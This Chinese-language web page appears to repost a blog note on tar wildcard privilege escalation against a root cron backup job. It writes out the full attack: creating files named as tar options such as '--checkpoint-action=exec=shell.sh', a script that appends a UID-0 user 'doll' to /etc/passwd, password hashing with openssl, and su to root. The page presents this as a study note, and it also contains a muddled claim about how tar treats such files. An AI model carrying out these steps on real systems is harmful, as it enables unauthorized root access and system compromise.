尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

tar通配符提权

tar通配符提权
📅 发布时间:2026/6/19 13:41:19

这个在cron提权的四种可以看到,这里觉得比较重要,就单独写出来了,仅讲一个原理,具体还是看cron提权笔记吧,毕竟他有图

tar命令提权本质:利用文件来注入命令行参数

tar命令参数特性:tar命令的参数是以 -- 开头的,若有文件以 -- 开头,tar会把它当作命令来执行

例子:原命令

tar -czf /root/website/backup.tar.gz *

解释:把当前目录下所有文件打包为 /root/website/backup.tar.gz

例:(1)在当前目录(/var/www/html)下新建 index-file=output.txt 文件:
touch '/var/www/html/--index-file=output.txt'(2)执行tar命令:
tar -czf /root/.../backup.tar.gz *
原命令变为 tar -czf /root/.../backup.tar.gz --index-file=output.txt output.txt ...
(即把归档过程的详细记录写入 output.txt 文件中)

(2)用于提权(tar以root权限运行)

【1】 tar的参数:--checkpoint-action=exec=shell.sh

解释:这样tar会在归档时执行当前目录下的 shell.sh 脚本

一、向 shell.sh 中写入payload(如向 /etc/passwd 写入一个高权限用户 doll):[1] echo '#!/bin/bash' > /var/www/html/shell.sh (写入shebang)[2] echo " " >> /var/www/html/shell.sh (空一行)[3] echo 'echo "doll:密码hash:0:0:root:/root:/bin/bash" >> /etc/passwd' >> /var/www/html/shell.sh##注:生成密码:
在本机Kali上用 openssl passwd doll (得到一个哈希值,即可写入到上面的 echo 语句中)
二、赋予 shell.sh 可执行权限:
chmod 755 ./shell.sh (此时可执行 shell.sh 脚本)
验证提权:
cat /etc/passwd | grep doll 可看到新增的 doll 用户
su doll 输入密码即可切换到 root(因为 /etc/passwd 中配置了该用户为root权限)

q:tar怎么自动执行?当然是定时任务了,且上面场景是基于tar以root权限执行

在定时任务中有这样一条命令:

5 * * * * root cd /var/www/html && tar -zcf /root/website/backup.tar.gz *

本文来自博客园,作者:Doll_Marker,转载请注明原文链接:https://www.cnblogs.com/dollaikun/p/20650910

相关新闻

  • Simulink仿真智能化:基于Agentic AI的自动化参数调优与测试框架
  • 如何实现安全的第三方插件系统:ReadCat插件沙箱与数据保护完整指南
  • Windows资源管理器的3D模型可视化革命:Space Thumbnails完全指南

最新新闻

  • 目前口碑好的碱泵工厂哪家可靠 - 速递信息
  • 杭州黄金回收哪家正规2026实测 上城萧山实体门店测评 - 润富黄金回收
  • MBD_实战篇_Stateflow在汽车控制器状态管理中的核心应用
  • 7天掌握高效云存储与图片管理:PicList实战指南
  • 杭州亨得利浪琴手表计时归位故障全记录:官方售后深度实测,附2026全国正规服务网点大全 - 亨得利腕表维修中心
  • 长沙闲置名包回收选哪家?逸程持证估价,变现更安心 - 逸程

日新闻

  • 5分钟掌握Python进化算法:Geatpy高性能优化工具完全指南
  • Microchip 24AA044 EEPROM选型与应用全指南:从参数解析到实战编程
  • 华为的鸿蒙到底有多牛?为什么称作遥遥领先?

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号